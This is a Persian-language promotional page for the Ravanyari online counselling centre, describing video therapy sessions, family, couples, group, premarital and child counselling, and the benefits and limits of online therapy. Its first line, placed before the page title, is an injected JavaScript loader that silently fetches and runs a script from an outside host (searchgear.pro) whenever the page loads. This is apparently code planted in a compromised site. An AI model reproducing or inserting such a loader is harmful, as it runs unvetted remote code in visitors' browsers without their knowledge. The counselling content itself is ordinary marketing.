;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); مشاوره روانشناسی آنلاین | مرکز مشاوره آنلاین روان‌یاری

مشاوره روانشناسی آنلاین

امروزه با توجه به وجود مشکلات گوناگون در زندگی، داشتن یک مشاور مجرب می تواند از خستگی ها و مشکلات بکاهد و افراد را به سمت پیشرفت در مسیر شغلی، زندگی شخصی و ارتباطات سوق دهد. از طرفی همه ما ناچار هستیم که خود را با سرعت بالای زندگی وفق دهیم و از زمان اندکی که در طول یک شبانه روز داریم، نهایت استفاده را ببریم.

همین موضوع سبب شده است تا بسیاری از نیازهایمان همچون خرید منزل و گرفتن نوبت از پزشک را با استفاده از اینترنت و به صورت آنلاین رفع کنیم. بدین صورت حداکثر صرفه جویی را در زمان خود می کنیم و به جای این که وقت خود را در رفت و آمد بگذرانیم، این زمان را صرف اموری که برایمان اولویت بیشتری دارند می کنیم. مشاوره آنلاین و غیرحضوری نیز یکی از اقداماتی است که به لطف وجود تکنولوژی می توانیم انجام دهیم.

نحوه برگزاری جلسات مشاوره آنلاین روانشناسی

بسته به شرایطی که شما دارید، می توانید خدمات مشاوره آنلاین را به شکل های گوناگونی دریافت کنید. در این بخش شما را با نحوه برگزاری این جلسات بیشتر آشنا می کنیم.

 • مشاوره آنلاین متنی: شاید این شیوه دریافت مشاوره در نگاه اول به نظرتان بسیار عجیب به نظر برسد. اما باید بگوییم هستند کسانی که در شرایط روحی، فیزیکی یا خانوادگی مناسب برای تماس تلفنی یا تصویری قرار ندارند. بنابراین بهترین شیوه دریافت مشاوره برای این افراد، مشاوره آنلاین متنی است. این ارتباط می تواند از طریق ایمیل و پیام رسان های گوناگون شکل بگیرد. بیان این نکته نیز خالی از لطف نیست که روانشناسان بزرگ و پرآوازه ای همچون فروید نیز از طریق نامه نگاری با برخی از مراجعان خود در ارتباط بودند. به هر حال بر حسب الزام، می توانید از این شیوه دریافت مشاوره برخوردار شد.
 • مشاوره آنلاین صوتی: یکی دیگر از شکل های برگزاری جلسات مشاوره روانشناسی آنلاین، برقراری یک گفتگوی صوتی است. در این شیوه شما قادر هستید تمام مسائلی که برای حل آن ها نیاز به کمک دارید را بازگو کرده و تعاملات لازم را با مشاور خود داشته باشید. این تماس می تواند به صورت تلفنی باشد یا در پیام رسان های گوناگون برقرار شود.
 • مشاوره ویدیویی یا تصویری: در میان روش های گوناگون برقراری جلسات آنلاین، مشاوره ویدیویی از بقیه کامل تر است. در واقع این شیوه بیشترین شباهت را به جلسات حضوری دارد. از طرفی روانشناسان در این روش می توانند با مشاهده زبان بدن و حالت چهره مراجعان، تحلیل بهتری از وضعیت آن ها داشته باشند.

مرکز مشاوره آنلاین روان‌یاری فقط از شیوه‌ی مشاوره ویدیویی یا تصویری برای مراجعان خود استفاده می‌نماید.

مرکز مشاوره روانشناسی آنلاین روان‌یاری چه خدماتی ارائه می دهد؟

همانطور که میدانید، خدمات مشاوره روانشناسی در حیطه های گوناگونی به کاربران ارائه می شوند. در اکثر این حوزه ها، علاوه بر امکان شرکت در جلسات حضوری، می توان خدمات آنلاین را نیز دریافت کرد. در ادامه به این حیطه ها اشاره می کنیم:

 

خانواده درمانی

انسان ها موجوداتی اجتماعی هستند که معمولا به همراه خانواده زندگی می کنند و روابط بین فردی پیچیده ای دارند. همین موضوع نیز سبب شده است که حیطه ای تحت عنوان خانواده درمانی در روانشناسی به وجود بیاید. در این حوزه، روانشناس به جای تمرکز بر مشکلات یک فرد، بر مسائل خانواده تمرکز می کند. هدف این حوزه از روانشناسی، حل مشکلات بین فردی در اعضای خانواده و بهبود روابط میان آن ها است. شما می توانید این خدمات را به صورت آنلاین نیز دریافت کنید.

گروه درمانی

گروه درمانی نسبت به سایر روش های درمانی مورد استفاده در روانشناسی بالینی جدیدتر است. در طی این جلسات مشاوره غیر حضوری، گروهی از افرادی که عمدتا از یک موضوع خاص رنج می برند با یکدیگر به تعامل می پردازند. این کار با نظارت و هدایت روانشناس صورت می پذیرد. گروه درمانی شیوه های مختلفی دارد و نتیجه بخش بودن آن در سال های اخیر، بسیاری از محققان را حیرت زده کرده است. در واقع این احساس که شما در دست و پنجه نرم کردن با یک مشکل تنها نیستید و افراد دیگری نیز درگیر آن هستند قوت قلبی است که نیروی لازم را برای ادامه جلسات در شما ایجاد می کند.

مشاوره فردی

مشاوره فردی یکی از مهمترین خدماتی است که توسط مراکز مشاوره به مراجعان ارائه می شود. در این حوزه، مشکلاتی پیرامون تصمیمات و انتخاب ها، مقابله با اضطراب، عزت نفس، اراده، نا امیدی و … مورد بررسی قرار می گیرد. در صورتی که شما نیز احساس می کنید نیاز به دریافت مشاوره فردی دارید، استفاده از خدمات مشاوره آنلاین از مراکز معتبر را به شما پیشنهاد می کنیم. مرکز روانشناسی روان‌یاری یکی از بهترین مجموعه هایی است که می تواند به صورت کاملا حرفه ای، به شما در این حیطه کمک کند.

مشاوره قبل از ازدواج

خدمات مشاوره قبل از ازدواج به منظور افزایش موفقیت ازدواج انجام می شود. برای این کار نیاز به انجام تست های روانشناسی و تفسیر تست ها توسط روانشناسان وجود دارد. همچنین یک سری جلسات با حضور هر دو نفر و برخی جلسات به صورت تک نفره برگزار می شود تا تناسب آن ها با یکدیگر از جنبه های مختلف بررسی شود. خوشبختانه امروزه امکان ارائه این خدمات به صورت آنلاین نیز به وجود آمده است.

مشاوره کودک و نوجوان

برای حل مشکلات تربیتی یا رشد فرزندان خود، بهتر است از خدمات مشاوره کودک و نوجوان استفاده نمایید. در طی این جلسات مشاوره روانشناسی آنلاین، مشکلات شما به صورت دقیق و موشکافانه توسط متخصصان مجرب بررسی می شود. مطمئن باشید پس از برگزاری یک جلسه مشاوره آنلاین در این حیطه، مشتاقانه ادامه جلسات را دنبال خواهید کرد.

زوج درمانی

یکی از حیطه های دیگر مشاوره روانشناسی آنلاین، زوج درمانی است. این حوزه از روانشناسی به بررسی مشکلات میان زن و شوهرها اختصاص می یابد. در صورتی که می خواهید مشکلات شما توسط یک روانشناس خبره ریشه یابی شده و راهکارهای مناسب ارائه شوند، کافی است از خدمات مشاوره غیر حضوری موسسه روان‌یاری بهره ببرید.

گروه درمانی آنلاین

مزایای مشاوره روانشناسی آنلاین

از جمله مزیت های این روش می توان به موارد زیر اشاره کرد:

 1. عدم وجود محدودیت زمانی و مکانی
 2. انعطاف پذیری ساعات جلسات مشاوره
 3. صرفه جویی در زمان
 4. امکان برگزاری جلسات مشاوره با افراد هم زبان (مخصوص کسانی که مهاجرت کرده اند)
 5. قابلیت برخورداری افرادی با مشکلات حرکتی از خدمات مشاوره
 6. امکان دسترسی به مشاوران گوناگون با تخصص های متفاوت

10+

درمانگر

380+

مراجع

3000+

ساعت مشاوره

5+

سال تجربه

شرایط لازم برای ثمربخشی مشاوره آنلاین

با وجود تمام مزایایی که برای مشاوره روانشناسی آنلاین برشمردیم، نیاز به وجود یک سری پیش زمینه ها برای ثمربخشی این جلسات وجود دارد. به عنوان مثال احتمالا بهره مندی از مشاوره غیر حضوری برای افرادی با ویژگی های زیر موثر نخواهد بود:

 • بیمارانی با اختلالات جدی و شدید روانی
 • مراجعانی با تمایلات بالا به خودکشی

البته ممکن است مشاوره غیر حضوری برای این افراد به عنوان یک عامل محرک و موثر عمل کند اما به هیچ عنوان نمی تواند جای درمان های لازم را بگیرد. با این حال باید بگوییم در صورتی که جزو افراد بالا نیستید و قصد دریافت مشاوره روانشناسی آنلاین را دارید، برای ثمربخشی این جلسات تنها کافی است یک روانشناس مجرب را انتخاب کرده و مشاوره را شروع کنید. همچنین باید خود را ملزم کنید راهکارهای ارائه شده را به کار ببندید و جلسات را ادامه دهید تا نتیجه مورد نظر را بگیرید.

مشاوره آنلاین
خدمات مشاوره روانشناسی آنلاین

مشاوره آنلاین در چه زمینه هایی کارآمد است؟

باید بگوییم که تجربه مشاوره روانشناسی آنلاین می تواند در تمامی زمینه های ذکر شده، بسیار لذت بخش و کارآمد باشد. البته این امر تنها زمانی محقق می شود که از یک مشاور توانمند کمک بگیرید. تحقیقات نشان داده اند که دریافت مشاوره روانشناسی آنلاین برای درمان اختلال هایی همچون اضطراب اجتماعی، افسردگی، پانیک و … موثر عمل خواهد کرد. از طرفی نظرسنجی هایی که از مراجعه کنندگان انجام شده است، تاثیر مثبت جلسات مشاوره غیر حضوری در بهبود آن ها را نشان داده است.

تمام تلاش روانشناسانی که به صورت آنلاین با مراجعان خود در ارتباط هستند این است که با بکارگیری شیوه های نوین روانشناسی، همان احساسی را در آن ها ایجاد نمایند که در یک جلسه حضوری ممکن است تجربه کنند. این مشاوران ضمن آشنایی با مهارت های لازم برای ترغیب کردن مراجعان به برقراری یک ارتباط دوستانه، ریشه مشکلات آن ها را پیدا کرده و راهکارهای لازم را ارائه می دهند.

چگونه می توانم از خدمات مشاوره آنلاین بهره مند شوم؟

نخستین قدم برای دریافت این خدمات، انتخاب یک مرکز مشاوره آنلاین معتبر و مجرب است. در حالت عادی معمولا از طریق دوستان و آشنایان خود با یک مرکز مشاوره آشنا شده و به آن مراجعه می کنیم. در غیر اینصورت نیز انتخاب یک مرکز مشاوره تخصصی که روانشناسانی حرفه ای را در اختیار داشته باشد کار سختی نیست.

امروزه کاربران اینترنت در پلتفرم های گوناگون به بحث و بررسی خدمات دریافتی از مراکز مختلف می پردازند. بنابراین با اندکی سرچ کردن در موتورهای جستجو خواهید توانست مراکز معتبری را پیدا کنید که در این حیطه مشغول به فعالیت هستند. ما مجموعه روان‌یاری را به عنوان یکی از مراکزی که با در اختیار داشتن روانشناسانی حرفه ای و متخصص به ارائه خدمات می پردازد، به شما معرفی می کنیم. برای ارتباط با این مشاوران و دریافت خدمات می توانید از طریق راه های ارتباطی اقدام نمایید.

مقالات گوناگونی در منابع علمی به چاپ رسیده اند که به صورت مستند نشان می دهند این جلسات مشاوره برای اکثر مراجعان آنلاین، اثربخش بوده اند. همچنین نظرسنجی های انجام شده از شرکت کنندگان در این جلسات، تایید کننده این ادعا است.

شما می توانید خدمات مختلفی را از این طریق دریافت کنید. از جمله مهمترین موضوعاتی که در مشاوره آنلاین به آن ها پرداخته می شود می توان به مشاوره قبل از ازدواج، زوج درمانی، گروه درمانی، مشاوره فردی و ... اشاره کرد.

مشاوره روانشناسی آنلاین

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.